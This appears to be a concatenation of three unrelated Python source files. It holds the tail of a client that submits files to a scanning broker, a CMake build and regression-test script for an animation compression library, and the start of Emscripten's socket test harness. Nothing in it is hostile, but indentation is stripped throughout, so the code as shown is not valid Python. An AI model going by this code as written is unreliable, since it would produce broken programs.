filenameParts = scanObject.filename.split("/")
os.symlink("%s" % (uid), "%s/%s" % (SAVE_PATH, filenameParts[-1]))
except:
print("Unable to create symlink for %s" % (uid))
f = open("%s/%s" % (SAVE_PATH, "results.log"), "w")
f.write(jsonResult)
f.close()
sys.exit(1)
else:
print("ERROR: No result received (scan timed out)")
return
else:
try:
fh = open('cloudscan.log', 'w')
fh.close()
except:
pass
for fname in fileList:
job_queue.put(fname)
for i in range(num_procs):
job_queue.put("STOP")
print("File list length: %s" % len(fileList))
for i in range(num_procs):
Process(target=worker, args=(options.nolimit, REQUEST_RETRIES, REQUEST_TIMEOUT, SAVE_PATH, SOURCE, return_level, hostname, USE_SSH, BROKER_HOST, SSH_HOST,ext_metadata,options.ephID,)).start()
results_processed = 0
while results_processed < len(fileList):
logging.debug("Files left: %s" % ((len(fileList) - results_processed)))
resultText = result_queue.get()
try:
# Process results
fh = open('cloudscan.log', 'ab')
fh.write('%s\n' % resultText)
fh.close()
results_processed += 1
except Exception as e:
raise
print('Wrote results to cloudscan.log')
except KeyboardInterrupt:
print("Interrupted by user, exiting...")
sys.exit(1)
def worker(nolimit, REQUEST_RETRIES, REQUEST_TIMEOUT, SAVE_PATH, SOURCE, return_level, hostname, USE_SSH, BROKER_HOST, SSH_HOST, ext_metadata, ephID):
# Set up ZMQ context
if USE_SSH:
try:
logging.debug("attempting to connect to broker at %s and SSH host %s" % (BROKER_HOST, SSH_HOST))
client = Client(BROKER_HOST, useSSH=True, sshHost=SSH_HOST)
except RuntimeError as e:
logging.exception("could not set up SSH tunnel to %s" % SSH_HOST)
sys.exit(1)
else:
logging.debug("SSH has been disabled.")
client = Client(BROKER_HOST)
randNum = randint(1, 10000)
for fname in iter(job_queue.get, 'STOP'):
print("Worker %s: Starting new request" % randNum)
try:
# Try to read the file
file_buffer = open(fname, 'rb').read()
file_len = len(file_buffer)
logging.debug("opened file %s with len %i" % (fname, file_len))
if file_len > 20971520 and not nolimit:
print("You're trying to scan a file larger than 20mb.. Are you sure?")
print("Use the --remove-limit flag if you really want to do this.")
print("File has not been scanned: %s" % fname)
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nFile has not been scanned due to size: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
except IOError as e:
print("\nERROR: The file does not exist: %s\n" % (fname,))
print("Moving to next file...")
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nFile has not been scanned due to an IO Error: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
try:
# Construct the object to be sent for scanning
externalObject = ExternalObject(buffer=file_buffer,
externalVars=ExternalVars(filename=fname,
ephID=ephID,
extMetaData=ext_metadata,
source="%s-%s-%s" % (SOURCE,
hostname,
getpass.getuser())),
level=return_level)
starttime = time.time()
result = client.send(externalObject, retry=REQUEST_RETRIES, timeout=REQUEST_TIMEOUT)
if not result:
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nFile timed out in the scanner: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
logging.debug("got reply in %s seconds" % str(time.time() - starttime))
rootObject = getRootObject(result)
jsonResult = getJSON(result)
resultText = '%s\n' % jsonResult
if return_level == level_full:
FILE_SAVE_PATH = "%s/%s" % (SAVE_PATH, get_scanObjectUID(rootObject))
if not os.path.exists(FILE_SAVE_PATH):
try:
os.makedirs(FILE_SAVE_PATH)
print("Writing results to %s..." % FILE_SAVE_PATH)
except (OSError, IOError) as e:
print("\nERROR: unable to write to %s...\n" % FILE_SAVE_PATH)
return
else:
print("\nOutput folder already exists! Skipping results output...\n")
return
for uid, scanObject in result.files.items():
f = open("%s/%s" % (FILE_SAVE_PATH, uid), "wb")
f.write(scanObject.buffer)
f.close()
if scanObject.filename and scanObject.depth != 0:
linkPath = "%s/%s" % (FILE_SAVE_PATH, scanObject.filename.replace("/","_"))
if not os.path.lexists(linkPath):
os.symlink("%s" % (uid), linkPath)
elif scanObject.filename:
filenameParts = scanObject.filename.split("/")
linkPath = "%s/%s" % (FILE_SAVE_PATH, filenameParts[-1])
if not os.path.lexists(linkPath):
os.symlink("%s" % (uid), linkPath)
f = open("%s/%s" % (FILE_SAVE_PATH, "results.json"), "wb")
f.write(jsonResult)
f.close()
result_queue.put(resultText)
except:
#logging.exception("error occured collecting results")
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nUNKNOWN ERROR OCCURRED: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
if __name__ == "__main__":
main()
|
make.py
|
# coding: utf-8
from __future__ import print_function
import argparse
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import time
import zipfile
# The current test/decompression data version in use
current_test_data = 'test_data_v3'
current_decomp_data = 'decomp_data_v5'
def parse_argv():
parser = argparse.ArgumentParser(add_help=False)
actions = parser.add_argument_group(title='Actions', description='If no action is specified, on Windows, OS X, and Linux the solution/make files are generated. Multiple actions can be used simultaneously.')
actions.add_argument('-build', action='store_true')
actions.add_argument('-clean', action='store_true')
actions.add_argument('-unit_test', action='store_true')
actions.add_argument('-regression_test', action='store_true')
target = parser.add_argument_group(title='Target')
target.add_argument('-compiler', choices=['vs2015', 'vs2017', 'vs2019', 'vs2019-clang', 'android', 'clang4', 'clang5', 'clang6', 'clang7', 'clang8', 'clang9', 'gcc5', 'gcc6', 'gcc7', 'gcc8', 'gcc9', 'osx', 'ios'], help='Defaults to the host system\'s default compiler')
target.add_argument('-config', choices=['Debug', 'Release'], type=str.capitalize)
target.add_argument('-cpu', choices=['x86', 'x64', 'armv7', 'arm64'], help='Defaults to the host system\'s architecture')
misc = parser.add_argument_group(title='Miscellaneous')
misc.add_argument('-avx', dest='use_avx', action='store_true', help='Compile using AVX instructions on Windows, OS X, and Linux')
misc.add_argument('-pop', dest='use_popcnt', action='store_true', help='Compile using the POPCNT instruction')
misc.add_argument('-nosimd', dest='use_simd', action='store_false', help='Compile without SIMD instructions')
misc.add_argument('-nosjson', dest='use_sjson', action='store_false', help='Compile without SJSON support')
misc.add_argument('-num_threads', help='No. to use while compiling and regressing')
misc.add_argument('-tests_matching', help='Only run tests whose names match this regex')
misc.add_argument('-help', action='help', help='Display this usage information')
num_threads = multiprocessing.cpu_count()
if platform.system() == 'Linux' and sys.version_info >= (3, 4):
num_threads = len(os.sched_getaffinity(0))
if not num_threads or num_threads == 0:
num_threads = 4
parser.set_defaults(build=False, clean=False, unit_test=False, regression_test=False, compiler=None, config='Release', cpu=None, use_avx=False, use_popcnt=False, use_simd=True, use_sjson=True, num_threads=num_threads, tests_matching='')
args = parser.parse_args()
# Sanitize and validate our options
if args.use_avx and not args.use_simd:
print('SIMD is disabled; AVX cannot be used')
args.use_avx = False
if args.compiler == 'android':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Windows':
print('Android is only supported on Windows')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on Android')
sys.exit(1)
if not args.cpu in ['armv7', 'arm64']:
print('{} cpu architecture not in supported list [armv7, arm64] for Android'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'ios':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Darwin':
print('iOS is only supported on OS X')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on iOS')
sys.exit(1)
if args.unit_test:
print('Unit tests cannot run from the command line on iOS')
sys.exit(1)
if not args.cpu in ['arm64']:
print('{} cpu architecture not in supported list [arm64] for iOS'.format(args.cpu))
sys.exit(1)
else:
if not args.cpu:
args.cpu = 'x64'
if args.cpu == 'arm64':
if not args.compiler in ['vs2017', 'vs2019', 'ios', 'android']:
print('arm64 is only supported with VS2017, VS2019, Android, and iOS')
sys.exit(1)
elif args.cpu == 'armv7':
if not args.compiler == 'android':
print('armv7 is only supported with Android')
sys.exit(1)
if platform.system() == 'Darwin' and args.cpu == 'x86':
result = subprocess.check_output(['xcodebuild', '-version']).decode("utf-8")
if 'Xcode 11' in result:
print('Versions of Xcode 11 and up no longer support x86')
sys.exit(1)
return args
def get_cmake_exes():
if platform.system() == 'Windows':
return ('cmake.exe', 'ctest.exe')
else:
return ('cmake', 'ctest')
def get_generator(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2015':
if cpu == 'x86':
return 'Visual Studio 14'
elif cpu == 'x64':
return 'Visual Studio 14 Win64'
elif compiler == 'vs2017':
if cpu == 'x86':
return 'Visual Studio 15'
elif cpu == 'x64':
return 'Visual Studio 15 Win64'
elif cpu == 'arm64':
# VS2017 ARM/ARM64 support only works with cmake 3.13 and up and the architecture must be specified with
# the -A cmake switch
return 'Visual Studio 15 2017'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
return 'Visual Studio 16 2019'
elif compiler == 'android':
# For Android, we use the default generator since we don't build with CMake
return None
elif platform.system() == 'Darwin':
if compiler == 'osx' or compiler == 'ios':
return 'Xcode'
else:
return 'Unix Makefiles'
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def get_architecture(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2017':
if cpu == 'arm64':
return 'ARM64'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
if cpu == 'x86':
return 'Win32'
else:
return cpu
# This compiler/cpu pair does not need the architecture switch
return None
def get_toolchain(compiler, cmake_script_dir):
if platform.system() == 'Windows' and compiler == 'android':
return os.path.join(cmake_script_dir, 'Toolchain-Android.cmake')
elif platform.system() == 'Darwin' and compiler == 'ios':
return os.path.join(cmake_script_dir, 'Toolchain-iOS.cmake')
# No toolchain
return None
def set_compiler_env(compiler, args):
if platform.system() == 'Linux':
os.environ['MAKEFLAGS'] = '-j{}'.format(args.num_threads)
if compiler == 'clang4':
os.environ['CC'] = 'clang-4.0'
os.environ['CXX'] = 'clang++-4.0'
elif compiler == 'clang5':
os.environ['CC'] = 'clang-5.0'
os.environ['CXX'] = 'clang++-5.0'
elif compiler == 'clang6':
os.environ['CC'] = 'clang-6.0'
os.environ['CXX'] = 'clang++-6.0'
elif compiler == 'clang7':
os.environ['CC'] = 'clang-7'
os.environ['CXX'] = 'clang++-7'
elif compiler == 'clang8':
os.environ['CC'] = 'clang-8'
os.environ['CXX'] = 'clang++-8'
elif compiler == 'clang9':
os.environ['CC'] = 'clang-9'
os.environ['CXX'] = 'clang++-9'
elif compiler == 'gcc5':
os.environ['CC'] = 'gcc-5'
os.environ['CXX'] = 'g++-5'
elif compiler == 'gcc6':
os.environ['CC'] = 'gcc-6'
os.environ['CXX'] = 'g++-6'
elif compiler == 'gcc7':
os.environ['CC'] = 'gcc-7'
os.environ['CXX'] = 'g++-7'
elif compiler == 'gcc8':
os.environ['CC'] = 'gcc-8'
os.environ['CXX'] = 'g++-8'
elif compiler == 'gcc9':
os.environ['CC'] = 'gcc-9'
os.environ['CXX'] = 'g++-9'
else:
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def do_generate_solution(cmake_exe, build_dir, cmake_script_dir, test_data_dir, decomp_data_dir, args):
compiler = args.compiler
cpu = args.cpu
config = args.config
if compiler:
set_compiler_env(compiler, args)
extra_switches = ['--no-warn-unused-cli']
extra_switches.append('-DCPU_INSTRUCTION_SET:STRING={}'.format(cpu))
if args.use_avx:
print('Enabling AVX usage')
extra_switches.append('-DUSE_AVX_INSTRUCTIONS:BOOL=true')
if args.use_popcnt:
print('Enabling POPCOUNT usage')
extra_switches.append('-DUSE_POPCNT_INSTRUCTIONS:BOOL=true')
if not args.use_simd:
print('Disabling SIMD instruction usage')
extra_switches.append('-DUSE_SIMD_INSTRUCTIONS:BOOL=false')
if not args.use_sjson:
print('Disabling SJSON support')
extra_switches.append('-DUSE_SJSON:BOOL=false')
if not platform.system() == 'Windows' and not platform.system() == 'Darwin':
extra_switches.append('-DCMAKE_BUILD_TYPE={}'.format(config.upper()))
toolchain = get_toolchain(compiler, cmake_script_dir)
if toolchain:
extra_switches.append('-DCMAKE_TOOLCHAIN_FILE={}'.format(toolchain))
generator_suffix = ''
if compiler == 'vs2019-clang':
extra_switches.append('-T ClangCL')
generator_suffix = 'Clang CL'
if test_data_dir:
extra_switches.append('-DTEST_DATA_DIR:STRING="{}"'.format(test_data_dir))
if decomp_data_dir:
extra_switches.append('-DDECOMP_DATA_DIR:STRING="{}"'.format(decomp_data_dir))
# Generate IDE solution
print('Generating build files ...')
cmake_cmd = '"{}" .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(cmake_exe, build_dir, ' '.join(extra_switches))
cmake_generator = get_generator(compiler, cpu)
if not cmake_generator:
print('Using default generator')
else:
print('Using generator: {} {}'.format(cmake_generator, generator_suffix))
cmake_cmd += ' -G "{}"'.format(cmake_generator)
cmake_arch = get_architecture(compiler, cpu)
if cmake_arch:
print('Using architecture: {}'.format(cmake_arch))
cmake_cmd += ' -A {}'.format(cmake_arch)
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_build(cmake_exe, args):
config = args.config
print('Building ...')
cmake_cmd = '"{}" --build .'.format(cmake_exe)
if platform.system() == 'Windows':
if args.compiler == 'android':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target INSTALL'.format(config)
elif platform.system() == 'Darwin':
if args.compiler == 'ios':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target install'.format(config)
else:
cmake_cmd += ' --target install'
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tests', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.unit_tests/com.acl.unit_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_tests_cmake(ctest_exe, args):
ctest_cmd = '"{}" --output-on-failure --parallel {}'.format(ctest_exe, args.num_threads)
if platform.system() == 'Windows' or platform.system() == 'Darwin':
ctest_cmd += ' -C {}'.format(args.config)
if args.tests_matching:
ctest_cmd += ' --tests-regex {}'.format(args.tests_matching)
result = subprocess.call(ctest_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_tests(build_dir, ctest_exe, args):
print('Running unit tests ...')
if args.compiler == 'android':
do_tests_android(build_dir, args)
else:
do_tests_cmake(ctest_exe, args)
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
# We need to clear any previous line we might have to ensure we have no visual artifacts
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
def do_prepare_regression_test_data(test_data_dir, args):
print('Preparing regression test data ...')
current_test_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_test_data))
# Validate that our regression test data is present
if not os.path.exists(current_test_data_zip):
print('Regression test data not found: {}'.format(current_test_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
needs_decompression = not os.path.exists(current_test_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_test_data_zip))
with zipfile.ZipFile(current_test_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
regression_clips = []
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
if len(regression_clips) == 0:
print('No regression clips found')
sys.exit(1)
print('Found {} regression clips'.format(len(regression_clips)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
if len(test_configs) == 0:
print('No regression configurations found')
sys.exit(1)
print('Found {} regression configurations'.format(len(test_configs)))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Write our metadata file
with open(os.path.join(current_test_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('configs = [', file = metadata_file)
for config_filename, _ in test_configs:
print('\t"{}"'.format(os.path.relpath(config_filename, test_config_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename, _ in regression_clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_test_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_test_data_dir
def do_prepare_decompression_test_data(test_data_dir, args):
print('Preparing decompression test data ...')
current_data_zip = os.path.join(test_data_dir, '{}.zip'.format(current_decomp_data))
# Validate that our regression test data is present
if not os.path.exists(current_data_zip):
print('Decompression test data not found: {}'.format(current_data_zip))
return
# If it hasn't been decompressed yet, do so now
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
needs_decompression = not os.path.exists(current_data_dir)
if needs_decompression:
print('Decompressing {} ...'.format(current_data_zip))
with zipfile.ZipFile(current_data_zip, 'r') as zip_ref:
zip_ref.extractall(test_data_dir)
# Grab all the test clips
clips = []
for (dirpath, dirnames, filenames) in os.walk(current_data_dir):
for filename in filenames:
if not filename.endswith('.acl.bin'):
continue
clip_filename = os.path.join(dirpath, filename)
clips.append(clip_filename)
if len(clips) == 0:
print('No decompression clips found')
sys.exit(1)
print('Found {} decompression clips'.format(len(clips)))
# Grab all the test configurations
configs = []
config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(config_dir):
for (dirpath, dirnames, filenames) in os.walk(config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
if not filename == 'uniformly_sampled_quant_medium.config.sjson':
continue
config_filename = os.path.join(dirpath, filename)
configs.append(config_filename)
if len(configs) == 0:
print('No decompression configurations found')
sys.exit(1)
print('Found {} decompression configurations'.format(len(configs)))
# Write our metadata file
with open(os.path.join(current_data_dir, 'metadata.sjson'), 'w') as metadata_file:
print('configs = [', file = metadata_file)
for config_filename in configs:
print('\t"{}"'.format(os.path.relpath(config_filename, config_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
print('clips = [', file = metadata_file)
for clip_filename in clips:
print('\t"{}"'.format(os.path.relpath(clip_filename, current_data_dir)), file = metadata_file)
print(']', file = metadata_file)
print('', file = metadata_file)
return current_data_dir
def do_regression_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'regression_tester_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.regression_tests/com.acl.regression_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_regression_tests_cmake(ctest_exe, test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run regression tests')
sys.exit(1)
import queue
# Validate that our regression testing tool is present
if platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
regression_clips = []
current_test_data_dir = os.path.join(test_data_dir, current_test_data)
for (dirpath, dirnames, filenames) in os.walk(current_test_data_dir):
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
clip_filename = os.path.join(dirpath, filename)
regression_clips.append((clip_filename, os.path.getsize(clip_filename)))
# Grab all the test configurations
test_configs = []
test_config_dir = os.path.join(test_data_dir, 'configs')
if os.path.exists(test_config_dir):
for (dirpath, dirnames, filenames) in os.walk(test_config_dir):
for filename in filenames:
if not filename.endswith('.config.sjson'):
continue
config_filename = os.path.join(dirpath, filename)
test_configs.append((config_filename, filename))
# Sort the configs by name for consistency
test_configs.sort(key=lambda entry: entry[1])
# Sort clips by size to test larger clips first, it parallelizes better
regression_clips.sort(key=lambda entry: entry[1], reverse=True)
# Iterate over every clip and configuration and perform the regression testing
for config_filename, _ in test_configs:
print('Performing regression tests for configuration: {}'.format(os.path.basename(config_filename)))
regression_start_time = time.perf_counter()
cmd_queue = queue.Queue()
completed_queue = queue.Queue()
failed_queue = queue.Queue()
failure_lock = threading.Lock()
for clip_filename, _ in regression_clips:
cmd = '"{}" -acl="{}" -test -config="{}"'.format(compressor_exe_path, clip_filename, config_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((clip_filename, cmd))
# Add a marker to terminate the threads
for i in range(args.num_threads):
cmd_queue.put(None)
def run_clip_regression_test(cmd_queue, completed_queue, failed_queue, failure_lock):
while True:
entry = cmd_queue.get()
if entry is None:
return
(clip_filename, cmd) = entry
result = subprocess.call(cmd, shell=True)
if result != 0:
failed_queue.put((clip_filename, cmd))
failure_lock.acquire()
print('Failed to run regression test for clip: {}'.format(clip_filename))
print(cmd)
failure_lock.release()
completed_queue.put(clip_filename)
threads = [ threading.Thread(target = run_clip_regression_test, args = (cmd_queue, completed_queue, failed_queue, failure_lock)) for _i in range(args.num_threads) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(regression_clips), 'Testing clips:', '{} / {}'.format(0, len(regression_clips)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = completed_queue.qsize()
print_progress(num_processed, len(regression_clips), 'Testing clips:', '{} / {}'.format(num_processed, len(regression_clips)))
all_threads_done = True
for thread in threads:
if thread.isAlive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
regression_testing_failed = not failed_queue.empty()
regression_end_time = time.perf_counter()
print('Done in {}'.format(format_elapsed_time(regression_end_time - regression_start_time)))
if regression_testing_failed:
sys.exit(1)
def do_regression_tests(build_dir, ctest_exe, test_data_dir, args):
print('Running regression tests ...')
if args.compiler == 'android':
do_regression_tests_android(build_dir, args)
else:
do_regression_tests_cmake(ctest_exe, test_data_dir, args)
if __name__ == "__main__":
args = parse_argv()
cmake_exe, ctest_exe = get_cmake_exes()
# Set the ACL_CMAKE_HOME environment variable to point to CMake
# otherwise we assume it is already in the user PATH
if 'ACL_CMAKE_HOME' in os.environ:
cmake_home = os.environ['ACL_CMAKE_HOME']
cmake_exe = os.path.join(cmake_home, 'bin', cmake_exe)
ctest_exe = os.path.join(cmake_home, 'bin', ctest_exe)
build_dir = os.path.join(os.getcwd(), 'build')
test_data_dir = os.path.join(os.getcwd(), 'test_data')
cmake_script_dir = os.path.join(os.getcwd(), 'cmake')
if args.clean and os.path.exists(build_dir):
print('Cleaning previous build ...')
shutil.rmtree(build_dir)
if not os.path.exists(build_dir):
os.makedirs(build_dir)
os.chdir(build_dir)
print('Using config: {}'.format(args.config))
print('Using cpu: {}'.format(args.cpu))
if args.compiler:
print('Using compiler: {}'.format(args.compiler))
print('Using {} threads'.format(args.num_threads))
regression_data_dir = do_prepare_regression_test_data(test_data_dir, args)
decomp_data_dir = do_prepare_decompression_test_data(test_data_dir, args)
do_generate_solution(cmake_exe, build_dir, cmake_script_dir, regression_data_dir, decomp_data_dir, args)
if args.build:
do_build(cmake_exe, args)
if args.unit_test:
do_tests(build_dir, ctest_exe, args)
if args.regression_test and not args.compiler == 'ios':
do_regression_tests(build_dir, ctest_exe, test_data_dir, args)
sys.exit(0)
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import multiprocessing
import os
import socket
import shutil
import sys
import time
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner.py sockets')
import websockify
from runner import BrowserCore, no_windows, chdir, flaky
from tools import shared
from tools.shared import PYTHON, EMCC, NODE_JS, path_from_root, Popen, PIPE, WINDOWS, run_process, run_js, JS_ENGINES, CLANG_CC
npm_checked = False
NPM = os.path.join(os.path.dirname(NODE_JS[0]), 'npm.cmd' if WINDOWS else 'npm')
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.kill() # SIGKILL
except:
pass
class WebsockifyServerHarness(object):
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, path_from_root('tests', self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + shared.get_clang_native_args() + self.args, env=shared.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness(object):
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([PYTHON, EMCC, path_from_root('tests', self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(self):
super(sockets, self).setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
def test_sockets_echo(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
